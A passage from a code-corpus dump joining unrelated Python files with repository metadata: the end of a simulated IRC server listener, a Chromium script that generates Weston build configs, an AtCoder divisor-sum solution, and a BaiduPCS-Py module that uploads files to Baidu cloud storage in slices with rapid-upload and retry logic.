                self.irc_send_client_custom('botmaster', 'botmaster', self.server.servername, "PRIVMSG %s %s" % (target, message))
            # Echo the private message back to the user
            else:
                self.irc_send_client_custom(target, target, self.server.servername, "PRIVMSG %s %s" % (self.nick, message))

    def irc_NOTICE(self, cmd, params):
        pass

    def irc_PART(self, cmd, params):
        pass

    def irc_send_server(self, code, message):
        # Numeric reply originating from the server itself.
        self.request.sendall(":%s %s %s\r\n" % (self.server.servername, code, message))

    def irc_send_client(self, message):
        self.irc_send_client_custom(self.nick, self.user, self.server.servername, message)

    def irc_send_client_custom(self, nick, user, servername, message):
        # Message carrying an explicit nick!user@server prefix.
        self.request.sendall(":%s!%s@%s %s\r\n" % (nick, user, servername, message))
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """TCP server that handles each client connection on its own thread."""
    # Avoid [Errno 98] Address already in use due to TIME_WAIT status on TCP
    # sockets, for details see:
    # https://stackoverflow.com/questions/4465959/python-errno-98-address-already-in-use
    allow_reuse_address = True
###############################################################################
# Testing code
def test(config):
    """Placeholder for the module self-test (not implemented)."""
    pass
def main():
    """Stand-alone entry point: start the IRC listener and run until Ctrl-C."""
    logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
    config = {'port': '6667', 'usessl': 'No', 'timeout': 10, 'servername': 'localhost' }
    listener = IRCListener(config)
    listener.start()
    ###########################################################################
    # Run processing
    import time
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    ###########################################################################
    # Run tests
    test(config)
if __name__ == '__main__':
    main()
| 1.851563 | 2 |
third_party/weston/generate_configs.py | zealoussnow/chromium | 14,668 | 12766394 | <gh_stars>1000+
#!/usr/bin/env python
#
# Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Creates config files for building Weston."""
from __future__ import print_function
import os
import re
import shutil
import subprocess
import sys
import tempfile
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
CHROMIUM_ROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, '..', '..'))
sys.path.append(os.path.join(CHROMIUM_ROOT_DIR, 'build'))
import gn_helpers
# meson invocation used by every config-generation step below.
MESON = ['meson']
# Build options disabling optional Weston features (tests, extra backends,
# clients, integrations) so only the configuration headers get generated.
DEFAULT_BUILD_ARGS = [
    '-Dbuild_tests=false',
    '--buildtype', 'release',
    '-Dbackend-drm-screencast-vaapi=false',
    '-Dbackend-rdp=false',
    '-Dxwayland=false',
    '-Dcolor-management-lcms=false',
    '-Dpipewire=false',
    '-Dcolor-management-colord=false',
    '-Dremoting=false',
    '-Dsimple-dmabuf-drm=auto',
    '-Dshell-ivi=false',
    '-Ddemo-clients=false',
    '-Dsimple-clients=egl',
    '-Dlauncher-logind=false',
    '-Dweston-launch=false',
    '-Dscreenshare=false',
    '-Dsystemd=false',
    '-Dimage-jpeg=false',
    '-Dimage-webp=false',
    '-Dbackend-drm=false',
    '-Dbackend-default=wayland'
]
def PrintAndCheckCall(argv, *args, **kwargs):
    """Print *argv* and run it via subprocess.check_call.

    Extra positional/keyword arguments are forwarded to check_call.
    Raises subprocess.CalledProcessError on a non-zero exit status.
    """
    print('\n-------------------------------------------------\nRunning %s' %
          ' '.join(argv))
    # check_call() only ever returns 0 (it raises otherwise); the previous
    # unused `c = ...` assignment was dropped.
    subprocess.check_call(argv, *args, **kwargs)
def RewriteFile(path, search_replace):
    """Apply (regex, replacement) pairs to the file at *path* in place.

    The rewritten text is stripped and terminated with a single newline.
    """
    with open(path) as src:
        text = src.read()
    with open(path, 'w') as dst:
        for pattern, repl in search_replace:
            text = re.sub(pattern, repl, text)
        # Cleanup trailing newlines.
        dst.write(text.strip() + '\n')
def AddAttributeInConfig(path):
    """Append a default-visibility declaration of main() to a config header."""
    with open(path) as src:
        text = src.read()
    with open(path, 'w') as dst:
        dst.write(text.strip() + '\n')
        dst.write('\n' + '__attribute__((visibility("default"))) int main(int argc, char* argv[]);' + '\n')
def CopyConfigsAndCleanup(config_dir, dest_dir):
    """Move the generated config.h from *config_dir* into *dest_dir*.

    Creates *dest_dir* if missing and removes the temporary *config_dir*.
    """
    source = os.path.join(config_dir, 'config.h')
    if not os.path.exists(dest_dir):
        os.makedirs(dest_dir)
    shutil.copy(source, dest_dir)
    shutil.rmtree(config_dir)
def RewriteGitFile(path, data):
    """Write *data* to *path*, stripped and terminated with one newline."""
    with open(path, 'w') as f:
        # Cleanup trailing newlines.
        f.write(data.strip() + '\n')
def CopyGitConfigsAndCleanup(config_dir, dest_dir):
    """Move the generated git-version.h from *config_dir* into *dest_dir*.

    Creates *dest_dir* if missing and removes the temporary *config_dir*.
    """
    source = os.path.join(config_dir, 'git-version.h')
    if not os.path.exists(dest_dir):
        os.makedirs(dest_dir)
    shutil.copy(source, dest_dir)
    shutil.rmtree(config_dir)
def GenerateGitConfig(config_dir, env, special_args=[]):
    """Run meson in a temp dir, then emit git-version.h with the git id.

    NOTE(review): the mutable default for special_args is shared between
    calls; harmless here since it is never mutated.
    """
    temp_dir = tempfile.mkdtemp()
    PrintAndCheckCall(
        MESON + DEFAULT_BUILD_ARGS + special_args + [temp_dir],
        cwd='src',
        env=env)
    # BUILD_ID is the abbreviated commit hash of the src/ checkout.
    label = subprocess.check_output(["git", "describe", "--always"]).strip()
    label = label.decode("utf-8")
    RewriteGitFile(
        os.path.join(temp_dir, 'git-version.h'),
        "#define BUILD_ID \"{label}\"".format(label=label))
    CopyGitConfigsAndCleanup(temp_dir, config_dir)
def GenerateConfig(config_dir, env, special_args=[]):
    """Run meson in a temp dir and harvest its config.h into *config_dir*.

    NOTE(review): the mutable default for special_args is shared between
    calls; harmless here since it is never mutated.
    """
    temp_dir = tempfile.mkdtemp()
    PrintAndCheckCall(
        MESON + DEFAULT_BUILD_ARGS + special_args + [temp_dir],
        cwd='src',
        env=env)
    CopyConfigsAndCleanup(temp_dir, config_dir)
def ChangeConfigPath():
    """Strip absolute install-path defines from config.h and add the
    default-visibility main() declaration."""
    configfile = os.path.join(BASE_DIR, "config/config.h")
    # Install directories baked in by meson; their absolute paths are
    # machine-specific, so the defines are blanked out.
    DIRS = ["BINDIR",
            "DATADIR",
            "LIBEXECDIR",
            "LIBWESTON_MODULEDIR",
            "MODULEDIR"]
    for dir in DIRS:
        pattern = "#define {dir} \"/[a-zA-Z0-9\\-_/]+\"".format(dir=dir)
        RewriteFile(configfile, [(pattern, "")])
    # Add attribute in config.h to suppress all undefined symbol(function) warnings
    AddAttributeInConfig(configfile)
def GenerateWestonVersion():
    """Create version/libweston/version.h from version.h.in.

    The PACKAGE_VERSION define in the generated config/config.h supplies
    the numbers substituted for the @WESTON_VERSION_*@ placeholders.
    """
    dirname = os.path.join(BASE_DIR, "version/libweston")
    if not os.path.exists(dirname):
        os.makedirs(dirname)
    version_op_file = os.path.join(BASE_DIR, "version/libweston/version.h")
    configfile = os.path.join(BASE_DIR, "config/config.h")
    version_in_file = os.path.join(BASE_DIR, "src/include/libweston/version.h.in")
    version_number = "0.0.0"
    with open(configfile, 'r') as f:
        for line in f:
            if "PACKAGE_VERSION" in line:
                # e.g. '#define PACKAGE_VERSION "9.0.0"' -> take last token
                package_version_list = (line.strip("\n")).split(" ")
                version_number = package_version_list[-1]
    # major, minor, micro, plus the full dotted version as fourth entry.
    version_number_list = (version_number.strip('"\n"')).split(".")
    version_number_list.append(version_number.strip("\"\""))
    VERSIONS = ["@WESTON_VERSION_MAJOR@", "@WESTON_VERSION_MINOR@",
                "@WESTON_VERSION_MICRO@", "@WESTON_VERSION@"]
    with open(version_in_file) as f:
        contents = f.read()
    for version, version_number in zip(VERSIONS, version_number_list):
        pattern = version
        repl_string = version_number
        with open(version_op_file, 'w') as f:
            contents = re.sub(pattern, repl_string, contents)
            # Cleanup trailing newlines.
            f.write(contents.strip() + '\n')
    print("Created version.h file from version.h.in\n")
def RemoveUndesiredDefines():
    """Blank out config defines that would break running on older systems."""
    configfile = os.path.join(BASE_DIR, "config/config.h")
    # Weston doesn't have a meson option to avoid using memfd_create() method that was
    # introduced in GLIBC 2.27. That results in weston failing to run on Xenial based bot as
    # it has GLIBC 2.23, because this config might be generated on a system that has newer
    # libc libraries that meson checks with has_function() method. Thus, explicitly rewrite
    # the config to disable usage of that method.
    RewriteFile(configfile, [("#define HAVE_MEMFD_CREATE .*", "")])
def main():
    """Generate the checked-in Weston config and version headers with clang."""
    env = os.environ
    env['CC'] = 'clang'
    GenerateGitConfig('version', env)
    GenerateConfig('config', env)
    ChangeConfigPath()
    RemoveUndesiredDefines()
    GenerateWestonVersion()
if __name__ == '__main__':
    main()
| 1.757813 | 2 |
Others/diverta/diverta2019/d.py | KATO-Hiro/AtCoder | 2 | 12766395 | # -*- coding: utf-8 -*-
def solve(n):
    """Return the sum of all m with n // m == n % m.

    Such m satisfy n = q * (m + 1) for q = n // m, so m + 1 must divide n.
    Enumerating divisors i of n up to sqrt(n) and testing m = n // i - 1
    covers every candidate (small-divisor candidates cannot satisfy the
    condition, and i * i == n is excluded as in the original).
    """
    ans = 0
    for i in range(1, int(n ** 0.5) + 1):
        if n % i == 0 and (i ** 2) != n:
            m = n // i - 1
            if n // m == n % m:
                ans += m
    return ans


def main():
    """Read N from stdin and print the answer (extracted into solve())."""
    n = int(input())
    print(solve(n))


if __name__ == '__main__':
    main()
| 3.4375 | 3 |
baidupcs_py/commands/upload.py | UVJkiNTQ/BaiduPCS-Py | 0 | 12766396 | <gh_stars>0
from typing import Optional, List, Tuple, IO
import os
import time
import functools
from io import BytesIO
from enum import Enum
from pathlib import Path
from threading import Semaphore
from concurrent.futures import ThreadPoolExecutor, as_completed
from baidupcs_py.baidupcs.errors import BaiduPCSError
from baidupcs_py.baidupcs import BaiduPCSApi, FromTo
from baidupcs_py.common import constant
from baidupcs_py.common.path import is_file, exists, walk
from baidupcs_py.common.event import KeyHandler, KeyboardMonitor
from baidupcs_py.common.constant import CPU_NUM
from baidupcs_py.common.concurrent import sure_release, retry
from baidupcs_py.common.progress_bar import _progress, progress_task_exists
from baidupcs_py.common.localstorage import save_rapid_upload_info
from baidupcs_py.common.io import (
total_len,
rapid_upload_params,
EncryptType,
reset_encrypt_io,
)
from baidupcs_py.commands.log import get_logger
from requests_toolbelt import MultipartEncoderMonitor
from rich.progress import TaskID
from rich.table import Table
from rich.box import SIMPLE
from rich.text import Text
from rich import print
logger = get_logger(__name__)
# If slice size >= 100M, the rate of uploading will be much lower.
DEFAULT_SLICE_SIZE = 30 * constant.OneM
# Global pause flag, toggled by the keyboard handler below ("p" key).
UPLOAD_STOP = False
# Path of the rapid-upload info storage; set once by upload().
_rapiduploadinfo_file: Optional[str] = None
def _wait_start():
    """Block (polling once a second) while uploading is paused."""
    while UPLOAD_STOP:
        time.sleep(1)
def _toggle_stop(*args, **kwargs):
    """Flip the global UPLOAD_STOP pause flag (keyboard callback)."""
    global UPLOAD_STOP
    UPLOAD_STOP = not UPLOAD_STOP
    if UPLOAD_STOP:
        print("[i yellow]Uploading stop[/i yellow]")
    else:
        print("[i yellow]Uploading continue[/i yellow]")
# Pass "p" to toggle uploading start/stop
KeyboardMonitor.register(KeyHandler("p", callback=_toggle_stop))
def to_remotepath(sub_path: str, remotedir: str) -> str:
    """Join *sub_path* onto *remotedir* using POSIX separators."""
    joined = Path(remotedir) / sub_path
    return joined.as_posix()
def from_tos(localpaths: List[str], remotedir: str) -> List[FromTo]:
    """Find all localpaths and their corresponded remotepath"""
    ft: List[FromTo] = []
    for localpath in localpaths:
        if not exists(localpath):
            # Silently skip paths that do not exist (any more).
            continue
        if is_file(localpath):
            remotepath = to_remotepath(os.path.basename(localpath), remotedir)
            ft.append(FromTo(localpath, remotepath))
        else:
            # Directory: mirror it under remotedir, keeping the directory's
            # own name as the top-level component (only its parents are
            # stripped from each walked sub path).
            parents_num = max(len(Path(localpath).parts) - 1, 0)
            for sub_path in walk(localpath):
                relative_path = Path(*Path(sub_path).parts[parents_num:]).as_posix()
                remotepath = to_remotepath(relative_path, remotedir)
                ft.append(FromTo(sub_path, remotepath))
    return ft
class UploadType(Enum):
    """Upload Type

    One: Upload the slices of one file concurrently
    Many: Upload files concurrently
    """

    # Serialize over files; parallelize over the slices of each file.
    One = 1
    # Parallelize over whole files, one connection per file.
    Many = 2
def _handle_deadly_error(err, fail_count):
    """Re-raise PCS errors that a simple retry cannot recover from.

    Used inside the except_callback of the `retry` decorators below;
    raising here aborts the retry loop so the whole upload can restart.
    """
    # If following errors occur, we need to re-upload
    if isinstance(err, BaiduPCSError) and (
        err.error_code == 31352  # commit superfile2 failed
        or err.error_code == 31363  # block miss in superfile2
        or err.error_code == 31062  # invalid file name
    ):
        logger.warning(
            "Deadly error: %s, fail_count: %s",
            err,
            fail_count,
            exc_info=err,
        )
        raise err
# remotedir must be a directory
def upload(
    api: BaiduPCSApi,
    from_to_list: List[FromTo],
    upload_type: UploadType = UploadType.One,
    ondup: str = "overwrite",
    encrypt_password: bytes = b"",
    encrypt_type: EncryptType = EncryptType.No,
    max_workers: int = CPU_NUM,
    slice_size: int = DEFAULT_SLICE_SIZE,
    ignore_existing: bool = True,
    show_progress: bool = True,
    rapiduploadinfo_file: Optional[str] = None,
    user_id: Optional[int] = None,
    user_name: Optional[str] = None,
    check_md5: bool = False,
):
    """Upload from_tos

    Args:
        upload_type (UploadType): the way of uploading.
        max_workers (int): The number of concurrent workers.
        slice_size (int): The size of slice for uploading slices.
        ignore_existing (bool): Ignoring these localpath which of remotepath exist.
        show_progress (bool): Show uploading progress.
        check_md5 (bool): To fix the content md5 after `combine_slices`
            `combine_slices` always does not return correct content md5. To fix it,
            we need to use `rapid_upload_file` re-upload the content.
            Warning, if content length is large, it could take some minutes,
            e.g. it takes 5 minutes about 2GB.
    """
    logger.debug(
        "======== Uploading start ========\n-> UploadType: %s\n-> Size of from_to_list: %s",
        upload_type,
        len(from_to_list),
    )

    # Remember the rapid-upload info db path for the helpers below.
    global _rapiduploadinfo_file
    if _rapiduploadinfo_file is None:
        _rapiduploadinfo_file = rapiduploadinfo_file

    if upload_type == UploadType.One:
        upload_one_by_one(
            api,
            from_to_list,
            ondup,
            max_workers=max_workers,
            # Fix: the keyword value was an anonymization placeholder.
            encrypt_password=encrypt_password,
            encrypt_type=encrypt_type,
            slice_size=slice_size,
            ignore_existing=ignore_existing,
            show_progress=show_progress,
            user_id=user_id,
            user_name=user_name,
            check_md5=check_md5,
        )
    elif upload_type == UploadType.Many:
        upload_many(
            api,
            from_to_list,
            ondup,
            max_workers=max_workers,
            encrypt_password=encrypt_password,
            encrypt_type=encrypt_type,
            slice_size=slice_size,
            ignore_existing=ignore_existing,
            show_progress=show_progress,
            user_id=user_id,
            user_name=user_name,
            check_md5=check_md5,
        )
def _init_encrypt_io(
    api: BaiduPCSApi,
    localpath: str,
    remotepath: str,
    encrypt_password: bytes = b"",
    encrypt_type: EncryptType = EncryptType.No,
    ignore_existing: bool = True,
    task_id: Optional[TaskID] = None,
) -> Optional[Tuple[IO, int, int, int]]:
    """Open *localpath* wrapped in the requested encrypting reader.

    Returns (encrypt_io, encrypted_length, local_ctime, local_mtime) or
    None when *ignore_existing* is set and *remotepath* already exists
    (the progress task, if any, is removed in that case).
    """
    assert exists(Path(localpath)), f"`{localpath}` does not exist"
    if ignore_existing:
        try:
            if api.exists(remotepath):
                print(f"`{remotepath}` already exists.")
                logger.debug("`_init_encrypt_io`: remote file already exists")
                if task_id is not None and progress_task_exists(task_id):
                    _progress.remove_task(task_id)
                return None
        except Exception as err:
            # Existence check itself failed: drop the progress task and
            # let the caller's retry machinery see the error.
            if task_id is not None and progress_task_exists(task_id):
                _progress.remove_task(task_id)
            raise err
    stat = Path(localpath).stat()
    local_ctime, local_mtime = int(stat.st_ctime), int(stat.st_mtime)
    encrypt_io = encrypt_type.encrypt_io(open(localpath, "rb"), encrypt_password)
    # IO Length
    encrypt_io_len = total_len(encrypt_io)
    logger.debug(
        "`_init_encrypt_io`: encrypt_type: %s, localpath: %s, remotepath: %s, encrypt_io_len: %s",
        encrypt_type,
        localpath,
        remotepath,
        encrypt_io_len,
    )
    return (encrypt_io, encrypt_io_len, local_ctime, local_mtime)
def _rapid_upload(
    api: BaiduPCSApi,
    localpath: str,
    remotepath: str,
    slice256k_md5: str,
    content_md5: str,
    content_crc32: int,
    io_len: int,
    local_ctime: int,
    local_mtime: int,
    ondup: str,
    encrypt_password: bytes = b"",
    encrypt_type: EncryptType = EncryptType.No,
    task_id: Optional[TaskID] = None,
    user_id: Optional[int] = None,
    user_name: Optional[str] = None,
) -> bool:
    """Try a server-side rapid upload (dedup by content hashes).

    Returns True on success. Returns False when the server does not know
    the content (error 31079), meaning the caller must upload the bytes.
    Any other BaiduPCSError is re-raised.
    """
    logger.debug("`_rapid_upload`: rapid_upload starts")
    try:
        api.rapid_upload_file(
            slice256k_md5,
            content_md5,
            0,  # not needed
            io_len,
            remotepath,
            local_ctime=local_ctime,
            local_mtime=local_mtime,
            ondup=ondup,
        )
        if _rapiduploadinfo_file:
            save_rapid_upload_info(
                _rapiduploadinfo_file,
                slice256k_md5,
                content_md5,
                content_crc32,
                io_len,
                localpath=localpath,
                remotepath=remotepath,
                # Fix: the keyword value was an anonymization placeholder.
                encrypt_password=encrypt_password,
                encrypt_type=encrypt_type.value,
                user_id=user_id,
                user_name=user_name,
            )
        if task_id is not None and progress_task_exists(task_id):
            _progress.update(task_id, completed=io_len)
            _progress.remove_task(task_id)
        logger.debug("`_rapid_upload`: rapid_upload success, task_id: %s", task_id)
        return True
    except BaiduPCSError as err:
        logger.warning("`_rapid_upload`: rapid_upload fails")
        # 31079: file MD5 unknown to the server; upload the whole file.
        if err.error_code != 31079:
            if task_id is not None and progress_task_exists(task_id):
                _progress.remove_task(task_id)
            logger.warning("`_rapid_upload`: unknown error: %s", err)
            raise err
        else:
            logger.debug("`_rapid_upload`: %s, no exist in remote", localpath)
            if task_id is not None and progress_task_exists(task_id):
                _progress.reset(task_id)
        return False
@retry(20, except_callback=_handle_deadly_error)
def _combine_slices(
    api: BaiduPCSApi,
    remotepath: str,
    slice_md5s: List[str],
    local_ctime: int,
    local_mtime: int,
    ondup: str,
):
    """Combine previously uploaded slices into the final remote file.

    Retried up to 20 times; deadly PCS errors abort the retry loop via
    _handle_deadly_error.
    """
    api.combine_slices(
        slice_md5s,
        remotepath,
        local_ctime=local_ctime,
        local_mtime=local_mtime,
        ondup=ondup,
    )
def upload_one_by_one(
    api: BaiduPCSApi,
    from_to_list: List[FromTo],
    ondup: str,
    max_workers: int = CPU_NUM,
    encrypt_password: bytes = b"",
    encrypt_type: EncryptType = EncryptType.No,
    slice_size: int = DEFAULT_SLICE_SIZE,
    ignore_existing: bool = True,
    show_progress: bool = True,
    user_id: Optional[int] = None,
    user_name: Optional[str] = None,
    check_md5: bool = False,
):
    """Upload files one by one with uploading the slices concurrently"""
    with _progress:
        for from_to in from_to_list:
            task_id = None
            if show_progress:
                task_id = _progress.add_task("upload", start=False, title=from_to.from_)
            upload_file_concurrently(
                api,
                from_to,
                ondup,
                max_workers=max_workers,
                # Fix: the keyword value was an anonymization placeholder.
                encrypt_password=encrypt_password,
                encrypt_type=encrypt_type,
                slice_size=slice_size,
                ignore_existing=ignore_existing,
                task_id=task_id,
                user_id=user_id,
                user_name=user_name,
                check_md5=check_md5,
            )

    logger.debug("======== Uploading end ========")
@retry(
    -1,
    except_callback=lambda err, fail_count: (
        _handle_deadly_error(err, fail_count),
        logger.warning(
            "`upload_file_concurrently`: fails: error: %s, fail_count: %s",
            err,
            fail_count,
            exc_info=err,
        ),
    ),
)
def upload_file_concurrently(
    api: BaiduPCSApi,
    from_to: FromTo,
    ondup: str,
    max_workers: int = CPU_NUM,
    encrypt_password: bytes = b"",
    encrypt_type: EncryptType = EncryptType.No,
    slice_size: int = DEFAULT_SLICE_SIZE,
    ignore_existing: bool = True,
    task_id: Optional[TaskID] = None,
    user_id: Optional[int] = None,
    user_name: Optional[str] = None,
    check_md5: bool = False,
):
    """Upload one file by uploading its slices concurrently.

    Tries a rapid upload first (unencrypted content > 256K); otherwise
    splits the (possibly encrypted) stream into slice_size chunks, uploads
    them with up to max_workers threads and combines them remotely.
    """
    localpath, remotepath = from_to

    info = _init_encrypt_io(
        api,
        localpath,
        remotepath,
        # Fix: the keyword value was an anonymization placeholder.
        encrypt_password=encrypt_password,
        encrypt_type=encrypt_type,
        ignore_existing=ignore_existing,
        task_id=task_id,
    )
    if not info:
        return
    encrypt_io, encrypt_io_len, local_ctime, local_mtime = info

    # Progress bar
    if task_id is not None and progress_task_exists(task_id):
        _progress.update(task_id, total=encrypt_io_len)
        _progress.start_task(task_id)

    slice_completed = 0
    slice_completeds = {}  # current i-th index slice completed size

    def callback_for_slice(idx: int, monitor: MultipartEncoderMonitor):
        if task_id is not None and progress_task_exists(task_id):
            slice_completeds[idx] = monitor.bytes_read
            current_compledted: int = sum(list(slice_completeds.values()))
            _progress.update(task_id, completed=slice_completed + current_compledted)

    slice256k_md5 = ""
    content_md5 = ""
    content_crc32 = 0
    io_len = 0
    if encrypt_type == EncryptType.No and encrypt_io_len > 256 * constant.OneK:
        # Rapid Upload
        slice256k_md5, content_md5, content_crc32, io_len = rapid_upload_params(
            encrypt_io
        )
        ok = _rapid_upload(
            api,
            localpath,
            remotepath,
            slice256k_md5,
            content_md5,
            content_crc32,
            io_len,
            local_ctime,
            local_mtime,
            ondup,
            encrypt_password=encrypt_password,
            encrypt_type=encrypt_type,
            task_id=task_id,
            user_id=user_id,
            user_name=user_name,
        )
        if ok:
            return

    try:
        # Upload file slice
        logger.debug("`upload_file_concurrently`: upload_slice starts")

        reset_encrypt_io(encrypt_io)

        completed_slice_md5s = []

        def upload_slice(item: Tuple[int, IO]):
            idx, io = item

            # Retry upload until success
            slice_md5 = retry(
                -1,
                except_callback=lambda err, fail_count: (
                    _handle_deadly_error(err, fail_count),
                    io.seek(0, 0),
                    logger.warning(
                        "`upload_file_concurrently`: error: %s, fail_count: %s",
                        err,
                        fail_count,
                        exc_info=err,
                    ),
                    _wait_start(),
                ),
            )(api.upload_slice)(io, callback=functools.partial(callback_for_slice, idx))

            slice_completeds.pop(idx)
            completed_slice_md5s.append((idx, slice_md5))

            nonlocal slice_completed
            slice_completed += total_len(io)

        semaphore = Semaphore(max_workers)
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            futs = []
            offset = 0
            idx = 0
            while True:
                semaphore.acquire()

                size = min(slice_size, encrypt_io_len - offset)
                if idx != 0 and size == 0:
                    break

                data = encrypt_io.read(size)
                io = BytesIO(data or b"")

                fut = executor.submit(sure_release, semaphore, upload_slice, (idx, io))
                futs.append(fut)

                idx += 1
                offset += size

            as_completed(futs)

        # Restore the original slice order before combining.
        completed_slice_md5s.sort()
        slice_md5s = [md5 for _, md5 in completed_slice_md5s]

        # Combine slices
        _combine_slices(
            api,
            remotepath,
            slice_md5s,
            local_ctime,
            local_mtime,
            ondup,
        )

        logger.debug(
            "`upload_file_concurrently`: upload_slice and combine_slices success, task_id: %s",
            task_id,
        )

        # `combine_slices` can not get right content md5.
        # We need to check whether server updates by hand.
        if check_md5:
            _check_md5(
                api,
                localpath,
                remotepath,
                slice256k_md5,
                content_md5,
                content_crc32,
                io_len,
                encrypt_password=encrypt_password,
                encrypt_type=encrypt_type.value,
                user_id=user_id,
                user_name=user_name,
            )

        if task_id is not None and progress_task_exists(task_id):
            _progress.remove_task(task_id)
    except Exception as err:
        logger.warning("`upload_file_concurrently`: error: %s", err)
        raise err
    finally:
        encrypt_io.close()
        if task_id is not None and progress_task_exists(task_id):
            _progress.reset(task_id)
def upload_many(
    api: BaiduPCSApi,
    from_to_list: List[FromTo],
    ondup: str = "overwrite",
    encrypt_password: bytes = b"",
    encrypt_type: EncryptType = EncryptType.No,
    max_workers: int = CPU_NUM,
    slice_size: int = DEFAULT_SLICE_SIZE,
    ignore_existing: bool = True,
    show_progress: bool = True,
    rapiduploadinfo_file: Optional[str] = None,
    user_id: Optional[int] = None,
    user_name: Optional[str] = None,
    check_md5: bool = False,
):
    """Upload files concurrently that one file is with one connection"""
    excepts = {}
    semaphore = Semaphore(max_workers)
    with _progress:
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            futs = {}
            for idx, from_to in enumerate(from_to_list):
                semaphore.acquire()
                task_id = None
                if show_progress:
                    task_id = _progress.add_task(
                        "upload", start=False, title=from_to.from_
                    )

                logger.debug(
                    "`upload_many`: Upload: index: %s, task_id: %s", idx, task_id
                )

                fut = executor.submit(
                    sure_release,
                    semaphore,
                    upload_file,
                    api,
                    from_to,
                    ondup,
                    # Fix: the keyword value was an anonymization placeholder.
                    encrypt_password=encrypt_password,
                    encrypt_type=encrypt_type,
                    slice_size=slice_size,
                    ignore_existing=ignore_existing,
                    task_id=task_id,
                    user_id=user_id,
                    user_name=user_name,
                    check_md5=check_md5,
                )
                futs[fut] = from_to

            for fut in as_completed(futs):
                e = fut.exception()
                if e is not None:
                    from_to = futs[fut]
                    excepts[from_to] = e

    logger.debug("======== Uploading end ========")

    # Summary
    if excepts:
        table = Table(title="Upload Error", box=SIMPLE, show_edge=False)
        table.add_column("From", justify="left", overflow="fold")
        table.add_column("To", justify="left", overflow="fold")
        table.add_column("Error", justify="left")

        for from_to, e in sorted(excepts.items()):
            # Bugfix: the table declares three columns but only two values
            # were added, leaving the error under the "To" header and the
            # destination path missing entirely.
            table.add_row(from_to.from_, from_to.to_, Text(str(e), style="red"))
        _progress.console.print(table)
@retry(
    -1,
    except_callback=lambda err, fail_count: (
        _handle_deadly_error(err, fail_count),
        logger.warning(
            "`upload_file`: fails: error: %s, fail_count: %s",
            err,
            fail_count,
            exc_info=err,
        ),
    ),
)
def upload_file(
    api: BaiduPCSApi,
    from_to: FromTo,
    ondup: str,
    encrypt_password: bytes = b"",
    encrypt_type: EncryptType = EncryptType.No,
    slice_size: int = DEFAULT_SLICE_SIZE,
    ignore_existing: bool = True,
    task_id: Optional[TaskID] = None,
    user_id: Optional[int] = None,
    user_name: Optional[str] = None,
    check_md5: bool = False,
):
    """Upload one file with one connection.

    Strategy: for large unencrypted files, first try a "rapid upload"
    (hash-only, no data transfer); otherwise upload the file slice by slice
    and combine the slices on the server.  The surrounding ``@retry(-1,...)``
    decorator retries the whole upload forever on failure.

    Fix applied: three ``encrypt_password=`` keyword values had been
    destroyed by a redaction pass (``<PASSWORD>``), which is a syntax
    error; forwarding of the caller's password is restored.
    """
    _wait_start()

    localpath, remotepath = from_to

    info = _init_encrypt_io(
        api,
        localpath,
        remotepath,
        encrypt_password=encrypt_password,
        encrypt_type=encrypt_type,
        ignore_existing=ignore_existing,
        task_id=task_id,
    )
    if not info:
        # Nothing to upload (e.g. remote file exists and is being ignored).
        return
    encrypt_io, encrypt_io_len, local_ctime, local_mtime = info

    # Progress bar
    if task_id is not None and progress_task_exists(task_id):
        _progress.update(task_id, total=encrypt_io_len)
        _progress.start_task(task_id)

    slice_completed = 0

    def callback_for_slice(monitor: MultipartEncoderMonitor):
        # Closure over `slice_completed` so the bar reports overall progress,
        # not just the bytes of the slice currently in flight.
        if task_id is not None and progress_task_exists(task_id):
            _progress.update(task_id, completed=slice_completed + monitor.bytes_read)

    slice256k_md5 = ""
    content_md5 = ""
    content_crc32 = 0
    io_len = 0
    if encrypt_type == EncryptType.No and encrypt_io_len > 256 * constant.OneK:
        # Rapid Upload: only attempted for plain files larger than 256KB.
        slice256k_md5, content_md5, content_crc32, io_len = rapid_upload_params(
            encrypt_io
        )
        ok = _rapid_upload(
            api,
            localpath,
            remotepath,
            slice256k_md5,
            content_md5,
            content_crc32,
            io_len,
            local_ctime,
            local_mtime,
            ondup,
            encrypt_password=encrypt_password,
            encrypt_type=encrypt_type,
            task_id=task_id,
            user_id=user_id,
            user_name=user_name,
        )
        if ok:
            return

    try:
        # Upload file slice by slice.
        logger.debug("`upload_file`: upload_slice starts")

        slice_md5s = []
        reset_encrypt_io(encrypt_io)

        idx = 0
        while True:
            _wait_start()
            logger.debug(
                "`upload_file`: upload_slice: slice_completed: %s", slice_completed
            )
            size = min(slice_size, encrypt_io_len - slice_completed)
            # `idx != 0` guarantees at least one (possibly empty) slice is
            # uploaded, so zero-byte files still get stored.
            if idx != 0 and size == 0:
                break

            data = encrypt_io.read(size) or b""
            io = BytesIO(data)

            logger.debug(
                "`upload_file`: upload_slice: size should be %s == %s", size, len(data)
            )

            # Retry this single slice forever; on failure rewind the buffer
            # before the next attempt.
            slice_md5 = retry(
                -1,
                except_callback=lambda err, fail_count: (
                    _handle_deadly_error(err, fail_count),
                    io.seek(0, 0),
                    logger.warning(
                        "`upload_file`: `upload_slice`: error: %s, fail_count: %s",
                        err,
                        fail_count,
                        exc_info=err,
                    ),
                    _wait_start(),
                ),
            )(api.upload_slice)(io, callback=callback_for_slice)

            slice_md5s.append(slice_md5)
            slice_completed += size
            idx += 1

        # Combine slices into the final remote file.
        _combine_slices(
            api,
            remotepath,
            slice_md5s,
            local_ctime,
            local_mtime,
            ondup,
        )

        logger.debug(
            "`upload_file`: upload_slice and combine_slices success, task_id: %s",
            task_id,
        )

        # `combine_slices` can not get right content md5.
        # We need to check whether server updates by hand.
        if check_md5:
            _check_md5(
                api,
                localpath,
                remotepath,
                slice256k_md5,
                content_md5,
                content_crc32,
                io_len,
                encrypt_password=encrypt_password,
                encrypt_type=encrypt_type.value,
                user_id=user_id,
                user_name=user_name,
            )

        if task_id is not None and progress_task_exists(task_id):
            _progress.remove_task(task_id)
    except Exception as err:
        logger.warning("`upload_file`: error: %s", err)
        # Re-raise so the @retry decorator can attempt the upload again.
        raise err
